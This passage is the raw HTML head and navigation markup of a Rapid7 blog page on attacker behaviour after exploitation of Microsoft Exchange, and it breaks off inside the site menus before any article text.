Analyzing Attacker Behavior Post-Exploitation of MS Exchange

<!DOCTYPE html> <html class="no-js" lang="en" dir="ltr"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" charset="utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="preload" href="//opt.rapid7.com/edge-client/v1/13222550/21485331595" referrerpolicy="no-referrer-when-downgrade" as="script"> <link rel="preconnect" href="//logx.optimizely.com"> <title>Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog</title> <meta property="og:url" content="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" /> <link rel="canonical" href="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" /> <link rel="alternate" href="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" hreflang="en" /> <meta name="robots" content="index, follow" /> <meta name="title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog" /> <meta name="description" content="In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server." /> <meta property="og:title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog" /> <meta property="og:image" content="https://blog.rapid7.com/content/images/2021/03/zero-day-og-1.jpg" /> <meta name="twitter:image" content="https://blog.rapid7.com/content/images/2021/03/zero-day-og-1.jpg" /> <meta name="twitter:title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog"> <meta name="twitter:card" content="summary_large_image"> <meta property="og:site_name" content="Rapid7" /> <meta property="og:description" content="In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server." /> <link rel="stylesheet" href="/includes/css/all.min.css?cb=1731962207034"> <link rel="stylesheet" href="/includes/css/bundles/pages/page.blog-resources.min.css?cb=1731962207034" /> <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-featured-posts.min.css?cb=1731962207034" /> <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-single-post.min.css?cb=1731962207034" /> <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-related-posts.min.css?cb=1731962207034" /> <meta name="facetcat" content="blog" /> <script> var gIp = {"countryIsoCode":"SG","subdivisionIsoCode":null,"continentIsoCode":"AS"}; window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'conversionType': 'secondary', }); window.dataLayer.push({ 'auth': false }); window.dataLayer.push({ 'ip': '8.222.208.146' }); window.dataLayer.push({ 'isTrialUser': false, 'isCustomer': false }); </script> <script> window.dataLayer.push({ 'blog_post_tag': 'Zero-Day,Microsoft,Detection and Response,InsightIDR,Managed Detection and Response (MDR)' }); </script> <script src="https://opt.rapid7.com/edge-client/v1/13222550/21485331595" referrerpolicy="no-referrer-when-downgrade"></script> <script> (function (w, d, s, l, i) { w[l] = w[l] || []; w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' }); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-WBTPTVC');</script> <link rel="icon" type="image/x-icon" href="/includes/img/favicon.ico"> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Mulish:wght@800;900&family=Roboto:wght@300;400;700"> <link rel="preload" href="/includes/fonts/FFGoodProCompressedBlack/FFGoodProCompressedBlack.woff2" as="font" type="font/woff2" crossorigin="anonymous" /> <link rel="preload" href="/includes/fonts/FFGoodProCompressedBlack/FFGoodProCompressedBlack.woff" as="font" type="font/woff" crossorigin="anonymous" /> <script src="https://code.jquery.com/jquery-3.6.4.min.js" integrity="sha256-oP6HI9z1XaZNBrJURtCoUT5SUnxFr8s3BzRl+cbzUq8=" crossorigin="anonymous"></script> <script src="/includes/js/populateCountryState.js"></script> <script src="https://information.rapid7.com/js/forms2/js/forms2.min.js" ></script> <meta property="og:type" content="article" /> <meta property="article:published_time" content="2021-03-23T14:04:36" /> <meta property="article:modified_time" content="2023-04-05T20:01:43" /> <meta property="article:tag" content="Zero-Day" /> <meta property="article:tag" content="Microsoft" /> <meta property="article:tag" content="Detection and Response" /> <meta property="article:tag" content="InsightIDR" /> <meta property="article:tag" content="Managed Detection and Response (MDR)" /> <script src="//app-sj20.marketo.com/js/forms2/js/forms2.min.js"></script> <script type="application/ld+json"> { "@context":"https://schema.org", "@type":"Article", "publisher":{ "@type":"Organization", "name":"Rapid7 Blog", "logo":{ "@type":"ImageObject", "url":"https://www.rapid7.com/favicon.ico", "width":60, "height":60 } }, "author":{ "@type":"Person", "name":"Eoin Miller", "image":{ "@type":"ImageObject", "url":"https://blog.rapid7.com/assets/images/default-author-image.png" }, "url":"https://www.rapid7.com/blog/author/eoin/", "sameAs":[] }, "headline": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "url":"https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "image":{ "@type":"ImageObject", "url":"https://blog.rapid7.com/content/images/2021/03/zero-day.jpg" }, "keywords":"Zero-Day, Microsoft, Detection and Response, InsightIDR, Managed Detection and Response (MDR)", "description": "In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server.", "mainEntityOfPage":{ "@type":"WebPage", "@id":"https://www.rapid7.com/" }, "datePublished":"2021-03-23T14:04:36", "dateModified":"2023-04-05T20:01:43" } </script> <style type="text/css"> body .mktoForm .mktoFormCol, body .mktoForm .mktoFormRow { float: none; } #modal-subscribe h2 { padding-bottom: .25rem; } </style> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/styles/a11y-dark.min.css"> </head> <body class="pg-id-29536" data-page="29536">  <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WBTPTVC" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>  <div id="__"></div>  <div class="off-canvas-wrapper"> <div class="off-canvas-wrapper-inner" data-off-canvas-wrapper> <div id="r7-global-nav"> <header class="r7-nav mobile show-main--init "><section class="search-bar search-bar--mobile hide animate-out"><form action="/search"><div class="container flex flex-jc-c flex-ai-c"><div class="search-content flex flex-jc-fs flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" placeholder="Search"/><input type="submit" class="search-submit button blue" value="Search"/><a id="btnSearchCloseMobile" class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></div></div></form></section><div class="search-overlay search-overlay--mobile overlay "></div><nav class="main-nav "><div class="container flex flex-jc-sb flex-ai-c"><div class="flex flex-jc-c flex-ai-c"><a class="main-nav__toggle"><i class="r7-icon text-white"></i></a></div><a class="main-nav__logo flex flex-jc-c flex-ai-c text-center" href="https://www.rapid7.com/" target=""><img src="/Areas/Docs/includes/img/r7-nav/Rapid7_logo.svg" alt="Rapid7 Home"/></a><a class="search flex flex-jc-c flex-ai-c"><i class="r7-icon r7-icon-search-magnify text-white"></i></a></div><div class="main-nav__links flex flex-jc-c"><ul><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="" aria-role="button" aria-haspopup="dialog" aria-controls="d25400f0-f589-42d3-8784-33b2d0e6d6c5">Platform</a><div id="d25400f0-f589-42d3-8784-33b2d0e6d6c5" class="dropdown-content two-col" role="dialog" aria-labelledby="Platform"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">TECHNOLOGY</div><div class="dropdown-footer-title">The Rapid7 Command Platform</div><div class="dropdown-footer-subtitle">AI-Powered Cybersecurity Platform</div></div><div class="dropdown-button column-pad"><a href="/platform/" class="button" aria-role="button">Explore</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">PLATFORM</li><li class="dropdown-item"><a href="/platform/"><div class="dropdown-text">Platform<div class="dropdown-category">ELITE TECHNOLOGY</div></div></a></li><li class="dropdown-item"><a href="/info/ai-hub-page/"><div class="dropdown-text">AI-Engine<div class="dropdown-category">INTELLIGENT TOOLS</div></div></a></li><li class="dropdown-item"><a href="/research/"><div class="dropdown-text">Rapid7 Labs<div class="dropdown-category">TRUSTED INTELLIGENCE</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">SOLUTIONS</li><li class="dropdown-item"><a href="/services/managed-detection-and-response-mdr/"><div class="dropdown-text">Managed Threat Complete<div class="dropdown-category">MANAGED XDR</div></div></a></li><li class="dropdown-item"><a href="/products/command/attack-surface-management-asm/"><div class="dropdown-text">Surface Command<div class="dropdown-category">ATTACK SURFACE MANAGEMENT</div></div></a></li><li class="dropdown-item"><a href="/products/command/exposure-management/"><div class="dropdown-text">Exposure Command<div class="dropdown-category">EXPOSURE MANAGEMENT</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/products/" aria-role="button" aria-haspopup="dialog" aria-controls="3da5cd1a-20b1-48b9-8597-58b840744e10">Products</a><div id="3da5cd1a-20b1-48b9-8597-58b840744e10" class="dropdown-content two-col" role="dialog" aria-labelledby="Products"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">NEW!</div><div class="dropdown-footer-title">Exposure Command</div><div class="dropdown-footer-subtitle">Take Command of Your Attack Surface</div></div><div class="dropdown-button column-pad"><a href="/products/command/request-demo/" class="button" aria-role="button">Request Demo</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">DETECTION & RESPONSE</li><li class="dropdown-item"><a href="/products/insightidr/"><div class="dropdown-text">Next-Gen SIEM<div class="dropdown-category">INSIGHTIDR</div></div></a></li><li class="dropdown-item"><a href="/products/threat-command/"><div class="dropdown-text">Threat Intelligence<div class="dropdown-category">THREAT COMMAND</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">EXPOSURE MANAGEMENT</li><li class="dropdown-item"><a href="/products/command/exposure-management/"><div class="dropdown-text">Exposure Management<div class="dropdown-category">EXPOSURE COMMAND</div></div></a></li><li class="dropdown-item"><a href="/products/command/attack-surface-management-asm/"><div class="dropdown-text">Attack Surface Management<div class="dropdown-category">SURFACE COMMAND</div></div></a></li><li class="dropdown-item"><a href="/products/insightvm/"><div class="dropdown-text">Vulnerability Management<div class="dropdown-category">INSIGHTVM</div></div></a></li><li class="dropdown-item"><a href="/products/insightcloudsec/"><div class="dropdown-text">Cloud-Native Application Protection<div class="dropdown-category">INSIGHTCLOUDSEC</div></div></a></li><li class="dropdown-item"><a href="/products/insightappsec/"><div class="dropdown-text">Application Security Testing<div class="dropdown-category">INSIGHTAPPSEC</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/services/" aria-role="button" aria-haspopup="dialog" aria-controls="24a18958-405e-4709-aeb5-c68073726ad4">Services</a><div id="24a18958-405e-4709-aeb5-c68073726ad4" class="dropdown-content two-col" role="dialog" aria-labelledby="Services"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">MXDR</div><div class="dropdown-footer-title">Managed Threat Complete</div><div class="dropdown-footer-subtitle">24x7 MXDR to secure your extended ecosystem</div></div><div class="dropdown-button column-pad"><a href="/services/managed-detection-and-response-mdr/demo/" class="button" aria-role="button">Request Demo</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">DETECTION & RESPONSE</li><li class="dropdown-item"><a href="/services/managed-detection-and-response-mdr/"><div class="dropdown-text">Managed XDR<div class="dropdown-category">MANAGED THREAT COMPLETE</div></div></a></li><li class="dropdown-item"><a href="/services/incident-response-customer-escalation/"><div class="dropdown-text">Incident Response Services<div class="dropdown-category">EXPERIENCING A BREACH?</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">EXPOSURE MANAGEMENT</li><li class="dropdown-item"><a href="/services/managed-services/vulnerability-management/"><div class="dropdown-text">Managed Vulnerability Management<div class="dropdown-category">OPTIMIZED RISK ASSESSMENT</div></div></a></li><li class="dropdown-item"><a href="/services/managed-services/managed-appsec/"><div class="dropdown-text">Managed Application Security<div class="dropdown-category">MANAGED DAST</div></div></a></li><li class="dropdown-item"><a href="/services/continuous-red-team-service/"><div class="dropdown-text">Continuous Red Teaming<div class="dropdown-category">VECTOR COMMAND</div></div></a></li><li class="dropdown-item"><a href="/services/security-consulting/penetration-testing-services/"><div class="dropdown-text">Penetration Testing Services<div class="dropdown-category">TEST YOUR DEFENSES</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="" aria-role="button" aria-haspopup="dialog" aria-controls="30859528-f099-4dba-b032-4f818f660ce6">Resources</a><div id="30859528-f099-4dba-b032-4f818f660ce6" class="dropdown-content two-col" role="dialog" aria-labelledby="Resources"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">NEW</div><div class="dropdown-footer-title">The 2024 Attack Intelligence Report</div><div class="dropdown-footer-subtitle">Read the latest research by Rapid7 Labs</div></div><div class="dropdown-button column-pad"><a href="/research/report/2024-attack-intelligence-report/" class="button" aria-role="button">READ NOW</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">STAY CURRENT</li><li class="dropdown-item"><a href="/research/"><div class="dropdown-text">About Rapid7 Labs<div class="dropdown-category">MEET THE RESEARCH TEAM</div></div></a></li><li class="dropdown-item"><a href="/about/events-webcasts/"><div class="dropdown-text">Events & Webinars<div class="dropdown-category">CATCH US LIVE</div></div></a></li><li class="dropdown-item"><a href="/resources/"><div class="dropdown-text">Resources Library<div class="dropdown-category">DIVE INTO THE DETAILS</div></div></a></li><li class="dropdown-item"><a href="/blog/"><div class="dropdown-text">The Rapid7 Blog<div class="dropdown-category">STAY UP-TO-DATE</div></div></a></li><li class="dropdown-item"><a href="/db/"><div class="dropdown-text">Exploit Database<div class="dropdown-category">SEARCH THOUSANDS OF CVES</div></div></a></li><li class="dropdown-item"><a href="/fundamentals/"><div class="dropdown-text">Cybersecurity Fundamentals<div class="dropdown-category">LEARN THE BASICS</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">PRODUCT SUPPORT</li><li class="dropdown-item"><a href="/contact/"><div class="dropdown-text">Contact Sales<div class="dropdown-category">TALK TO AN EXPERT</div></div></a></li><li class="dropdown-item"><a href="/for-customers/"><div class="dropdown-text">Customer Support Portal<div class="dropdown-category">CONTACT SUPPORT</div></div></a></li><li class="dropdown-item"><a href="https://extensions.rapid7.com/"><div class="dropdown-text">Product Integrations<div class="dropdown-category">CONNECT EVERYTHING</div></div></a></li><li class="dropdown-item"><a href="https://docs.rapid7.com/"><div class="dropdown-text">Product Documentation<div class="dropdown-category">PRODUCT AND SERVICES GUIDES</div></div></a></li><li class="dropdown-item"><a href="https://docs.rapid7.com/release-notes/"><div class="dropdown-text">Product Release Notes<div class="dropdown-category">LATEST FEATURES</div></div></a></li><li class="dropdown-item"><a href="/product-tours/"><div class="dropdown-text">Interactive Product Tours<div class="dropdown-category">TAKE TOUR</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/about/company/" aria-role="button" aria-haspopup="dialog" aria-controls="c16cb871-37ad-437e-b1b2-414eee782343">Company</a><div id="c16cb871-37ad-437e-b1b2-414eee782343" class="dropdown-content two-col" role="dialog" aria-labelledby="Company"><ul class="dropdown-menu"><li class="dropdown-title">OVERVIEW</li><li class="dropdown-item"><a href="/about/company/"><div class="dropdown-text">About Us<div class="dropdown-category">OUR STORY</div></div></a></li><li class="dropdown-item"><a href="/about/leadership/"><div class="dropdown-text">Leadership<div class="dropdown-category">EXECUTIVE TEAM & BOARD</div></div></a></li><li class="dropdown-item"><a href="/about/news/"><div class="dropdown-text">News & Press Releases<div class="dropdown-category">THE LATEST FROM OUR NEWSROOM</div></div></a></li><li class="dropdown-item"><a href="https://careers.rapid7.com/"><div class="dropdown-text">Careers<div class="dropdown-category">JOIN RAPID7</div></div></a></li><li class="dropdown-item"><a href="/customers/"><div class="dropdown-text">Our Customers<div class="dropdown-category">Their Success Stories</div></div></a></li><li class="dropdown-item"><a href="/partners/"><div class="dropdown-text">Partners<div class="dropdown-category">Rapid7 Partner Ecosystem</div></div></a></li><li class="dropdown-item"><a href="https://investors.rapid7.com/"><div class="dropdown-text">Investors<div class="dropdown-category">Investor Relations</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">COMMUNITY & CULTURE</li><li class="dropdown-item"><a href="/about/social-good/"><div class="dropdown-text">Social Good<div class="dropdown-category">OUR COMMITMENT & APPROACH</div></div></a></li><li class="dropdown-item"><a href="/about/rapid7-foundation/"><div class="dropdown-text">Rapid7 Cybersecurity Foundation<div class="dropdown-category">BUILDING THE FUTURE</div></div></a></li><li class="dropdown-item"><a href="/about/diversity-equity-and-inclusion/"><div class="dropdown-text">Diversity, Equity & Inclusion<div class="dropdown-category">EMPOWERING PEOPLE</div></div></a></li><li class="dropdown-item"><a href="/open-source/"><div class="dropdown-text">Open Source<div class="dropdown-category">STRENGTHENING CYBERSECURITY</div></div></a></li><li class="dropdown-item"><a href="/about/public-policy/"><div class="dropdown-text">Public Policy<div class="dropdown-category">ENGAGEMENT & ADVOCACY</div></div></a></li><li class="dropdown-item"><a href="/about/rapid7-cybersecurity-partner-boston-bruins/"><div class="dropdown-text">Boston Bruins<div class="dropdown-category">Our Partnership</div></div></a></li></ul></div></li><li class="main-nav__link "><a class="" href="/partners/" aria-role="button" aria-haspopup="" aria-controls="9a9a3228-5e55-45d9-bcfc-5224e84b0b06">Partners</a></li><li class="dropdown main-nav__link main-nav__link--sep"><a href="#" class="dropdown-trigger has-toggle ">en</a><div class="dropdown-content right-align"><ul class="dropdown-menu"><li class="dropdown-item selected"><a href="#">English</a></li></ul></div></li><li class="main-nav__link"><a href="https://insight.rapid7.com/saml/SSO" class="has-icon"><img src="/Areas/Docs/includes/img/r7-nav/icon-lock.svg" alt=""/> Sign In</a></li></ul></div></nav><nav class="sub-nav container flex flex-ai-c"><div class="sub-nav__title"><a href="/blog/" title="Blog">Blog</a></div><ul><li class="sub-nav__link dropdown "><a class="dropdown-trigger has-toggle">Select</a><div class="dropdown-content"><ul class="dropdown-menu"><li class="dropdown-item"><a href="/blog/tag/vulnerability-management/">Vulnerability Management</a></li><li class="dropdown-item"><a href="/blog/tag/mdr-managed-detection-response/">MDR</a></li><li class="dropdown-item"><a href="/blog/tag/detection-and-response/">Detection & Response</a></li><li class="dropdown-item"><a href="/blog/tag/cloud-security/">Cloud Security</a></li><li class="dropdown-item"><a href="/blog/tag/application-security/">App Security</a></li><li class="dropdown-item"><a href="/blog/tag/metasploit/">Metasploit</a></li><li class="dropdown-item"><a href="/blog/tags/">All Topics</a></li></ul></div></li></ul><a class="button button--primary" href="/trial/insight/">Start Trial</a></nav></header><div class="dropdown-overlay overlay false"></div><header class="r7-nav stuck show-main--init "><nav class="main-nav"><div class="container flex flex-jc-sb flex-ai-c"><div class="main-nav__logo"><a class="flex" href="https://www.rapid7.com/" target=""><img src="/Areas/Docs/includes/img/r7-nav/Rapid7_logo.svg" alt="Rapid7 Home"/></a></div><div class="main-nav__links flex flex-jc-c"><ul><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="" aria-role="button" aria-haspopup="dialog" aria-controls="d25400f0-f589-42d3-8784-33b2d0e6d6c5">Platform</a><div id="d25400f0-f589-42d3-8784-33b2d0e6d6c5" class="dropdown-content two-col" role="dialog" aria-labelledby="Platform"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">TECHNOLOGY</div><div class="dropdown-footer-title">The Rapid7 Command Platform</div><div class="dropdown-footer-subtitle">AI-Powered Cybersecurity Platform</div></div><div class="dropdown-button column-pad"><a href="/platform/" class="button" aria-role="button">Explore</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">PLATFORM</li><li class="dropdown-item"><a href="/platform/"><div class="dropdown-text">Platform<div class="dropdown-category">ELITE TECHNOLOGY</div></div></a></li><li class="dropdown-item"><a href="/info/ai-hub-page/"><div class="dropdown-text">AI-Engine<div class="dropdown-category">INTELLIGENT TOOLS</div></div></a></li><li class="dropdown-item"><a href="/research/"><div class="dropdown-text">Rapid7 Labs<div class="dropdown-category">TRUSTED INTELLIGENCE</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">SOLUTIONS</li><li class="dropdown-item"><a href="/services/managed-detection-and-response-mdr/"><div class="dropdown-text">Managed Threat Complete<div class="dropdown-category">MANAGED XDR</div></div></a></li><li class="dropdown-item"><a href="/products/command/attack-surface-management-asm/"><div class="dropdown-text">Surface Command<div class="dropdown-category">ATTACK SURFACE MANAGEMENT</div></div></a></li><li class="dropdown-item"><a href="/products/command/exposure-management/"><div class="dropdown-text">Exposure Command<div class="dropdown-category">EXPOSURE MANAGEMENT</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/products/" aria-role="button" aria-haspopup="dialog" aria-controls="3da5cd1a-20b1-48b9-8597-58b840744e10">Products</a><div id="3da5cd1a-20b1-48b9-8597-58b840744e10" class="dropdown-content two-col" role="dialog" aria-labelledby="Products"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">NEW!</div><div class="dropdown-footer-title">Exposure Command</div><div class="dropdown-footer-subtitle">Take Command of Your Attack Surface</div></div><div class="dropdown-button column-pad"><a href="/products/command/request-demo/" class="button" aria-role="button">Request Demo</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">DETECTION & RESPONSE</li><li class="dropdown-item"><a href="/products/insightidr/"><div class="dropdown-text">Next-Gen SIEM<div class="dropdown-category">INSIGHTIDR</div></div></a></li><li class="dropdown-item"><a href="/products/threat-command/"><div class="dropdown-text">Threat Intelligence<div class="dropdown-category">THREAT COMMAND</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">EXPOSURE MANAGEMENT</li><li class="dropdown-item"><a href="/products/command/exposure-management/"><div class="dropdown-text">Exposure Management<div class="dropdown-category">EXPOSURE COMMAND</div></div></a></li><li class="dropdown-item"><a href="/products/command/attack-surface-management-asm/"><div class="dropdown-text">Attack Surface Management<div class="dropdown-category">SURFACE COMMAND</div></div></a></li><li class="dropdown-item"><a href="/products/insightvm/"><div class="dropdown-text">Vulnerability Management<div class="dropdown-category">INSIGHTVM</div></div></a></li><li class="dropdown-item"><a href="/products/insightcloudsec/"><div class="dropdown-text">Cloud-Native Application Protection<div class="dropdown-category">INSIGHTCLOUDSEC</div></div></a></li><li class="dropdown-item"><a href="/products/insightappsec/"><div class="dropdown-text">Application Security Testing<div class="dropdown-category">INSIGHTAPPSEC</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/services/" aria-role="button" aria-haspopup="dialog" aria-controls="24a18958-405e-4709-aeb5-c68073726ad4">Services</a><div id="24a18958-405e-4709-aeb5-c68073726ad4" class="dropdown-content two-col" role="dialog" aria-labelledby="Services"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">MXDR</div><div class="dropdown-footer-title">Managed Threat Complete</div><div class="dropdown-footer-subtitle">24x7 MXDR to secure your extended ecosystem</div></div><div class="dropdown-button column-pad"><a href="/services/managed-detection-and-response-mdr/demo/" class="button" aria-role="button">Request Demo</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">DETECTION & RESPONSE</li><li class="dropdown-item"><a href="/services/managed-detection-and-response-mdr/"><div class="dropdown-text">Managed XDR<div class="dropdown-category">MANAGED THREAT COMPLETE</div></div></a></li><li class="dropdown-item"><a href="/services/incident-response-customer-escalation/"><div class="dropdown-text">Incident Response Services<div class="dropdown-category">EXPERIENCING A BREACH?</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">EXPOSURE MANAGEMENT</li><li class="dropdown-item"><a href="/services/managed-services/vulnerability-management/"><div class="dropdown-text">Managed Vulnerability Management<div class="dropdown-category">OPTIMIZED RISK ASSESSMENT</div></div></a></li><li class="dropdown-item"><a href="/services/managed-services/managed-appsec/"><div class="dropdown-text">Managed Application Security<div class="dropdown-category">MANAGED DAST</div></div></a></li><li class="dropdown-item"><a href="/services/continuous-red-team-service/"><div class="dropdown-text">Continuous Red Teaming<div class="dropdown-category">VECTOR COMMAND</div></div></a></li><li class="dropdown-item"><a href="/services/security-consulting/penetration-testing-services/"><div class="dropdown-text">Penetration Testing Services<div class="dropdown-category">TEST YOUR DEFENSES</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="" aria-role="button" aria-haspopup="dialog" aria-controls="30859528-f099-4dba-b032-4f818f660ce6">Resources</a><div id="30859528-f099-4dba-b032-4f818f660ce6" class="dropdown-content two-col" role="dialog" aria-labelledby="Resources"><div class="dropdown-view-all"><ul class="dropdown-footer"><li class="dropdown-item"><div class="dropdown-text column-pad"><div class="dropdown-footer-pretitle">NEW</div><div class="dropdown-footer-title">The 2024 Attack Intelligence Report</div><div class="dropdown-footer-subtitle">Read the latest research by Rapid7 Labs</div></div><div class="dropdown-button column-pad"><a href="/research/report/2024-attack-intelligence-report/" class="button" aria-role="button">READ NOW</a></div></li></ul></div><ul class="dropdown-menu"><li class="dropdown-title">STAY CURRENT</li><li class="dropdown-item"><a href="/research/"><div class="dropdown-text">About Rapid7 Labs<div class="dropdown-category">MEET THE RESEARCH TEAM</div></div></a></li><li class="dropdown-item"><a href="/about/events-webcasts/"><div class="dropdown-text">Events & Webinars<div class="dropdown-category">CATCH US LIVE</div></div></a></li><li class="dropdown-item"><a href="/resources/"><div class="dropdown-text">Resources Library<div class="dropdown-category">DIVE INTO THE DETAILS</div></div></a></li><li class="dropdown-item"><a href="/blog/"><div class="dropdown-text">The Rapid7 Blog<div class="dropdown-category">STAY UP-TO-DATE</div></div></a></li><li class="dropdown-item"><a href="/db/"><div class="dropdown-text">Exploit Database<div class="dropdown-category">SEARCH THOUSANDS OF CVES</div></div></a></li><li class="dropdown-item"><a href="/fundamentals/"><div class="dropdown-text">Cybersecurity Fundamentals<div class="dropdown-category">LEARN THE BASICS</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">PRODUCT SUPPORT</li><li class="dropdown-item"><a href="/contact/"><div class="dropdown-text">Contact Sales<div class="dropdown-category">TALK TO AN EXPERT</div></div></a></li><li class="dropdown-item"><a href="/for-customers/"><div class="dropdown-text">Customer Support Portal<div class="dropdown-category">CONTACT SUPPORT</div></div></a></li><li class="dropdown-item"><a href="https://extensions.rapid7.com/"><div class="dropdown-text">Product Integrations<div class="dropdown-category">CONNECT EVERYTHING</div></div></a></li><li class="dropdown-item"><a href="https://docs.rapid7.com/"><div class="dropdown-text">Product Documentation<div class="dropdown-category">PRODUCT AND SERVICES GUIDES</div></div></a></li><li class="dropdown-item"><a href="https://docs.rapid7.com/release-notes/"><div class="dropdown-text">Product Release Notes<div class="dropdown-category">LATEST FEATURES</div></div></a></li><li class="dropdown-item"><a href="/product-tours/"><div class="dropdown-text">Interactive Product Tours<div class="dropdown-category">TAKE TOUR</div></div></a></li></ul></div></li><li class="main-nav__link dropdown "><a class="dropdown-trigger has-toggle" href="/about/company/" aria-role="button" aria-haspopup="dialog" aria-controls="c16cb871-37ad-437e-b1b2-414eee782343">Company</a><div id="c16cb871-37ad-437e-b1b2-414eee782343" class="dropdown-content two-col" role="dialog" aria-labelledby="Company"><ul class="dropdown-menu"><li class="dropdown-title">OVERVIEW</li><li class="dropdown-item"><a href="/about/company/"><div class="dropdown-text">About Us<div class="dropdown-category">OUR STORY</div></div></a></li><li class="dropdown-item"><a href="/about/leadership/"><div class="dropdown-text">Leadership<div class="dropdown-category">EXECUTIVE TEAM & BOARD</div></div></a></li><li class="dropdown-item"><a href="/about/news/"><div class="dropdown-text">News & Press Releases<div class="dropdown-category">THE LATEST FROM OUR NEWSROOM</div></div></a></li><li class="dropdown-item"><a href="https://careers.rapid7.com/"><div class="dropdown-text">Careers<div class="dropdown-category">JOIN RAPID7</div></div></a></li><li class="dropdown-item"><a href="/customers/"><div class="dropdown-text">Our Customers<div class="dropdown-category">Their Success Stories</div></div></a></li><li class="dropdown-item"><a href="/partners/"><div class="dropdown-text">Partners<div class="dropdown-category">Rapid7 Partner Ecosystem</div></div></a></li><li class="dropdown-item"><a href="https://investors.rapid7.com/"><div class="dropdown-text">Investors<div class="dropdown-category">Investor Relations</div></div></a></li></ul><ul class="dropdown-menu"><li class="dropdown-title">COMMUNITY & CULTURE</li><li class="dropdown-item"><a href="/about/social-good/"><div class="dropdown-text">Social Good<div class="dropdown-category">OUR COMMITMENT & APPROACH</div></div></a></li><li class="dropdown-item"><a href="/about/rapid7-foundation/"><div class="dropdown-text">Rapid7 Cybersecurity Foundation<div class="dropdown-category">BUILDING THE FUTURE</div></div></a></li><li class="dropdown-item"><a href="/about/diversity-equity-and-inclusion/"><div class="dropdown-text">Diversity, Equity & Inclusion<div class="dropdown-category">EMPOWERING 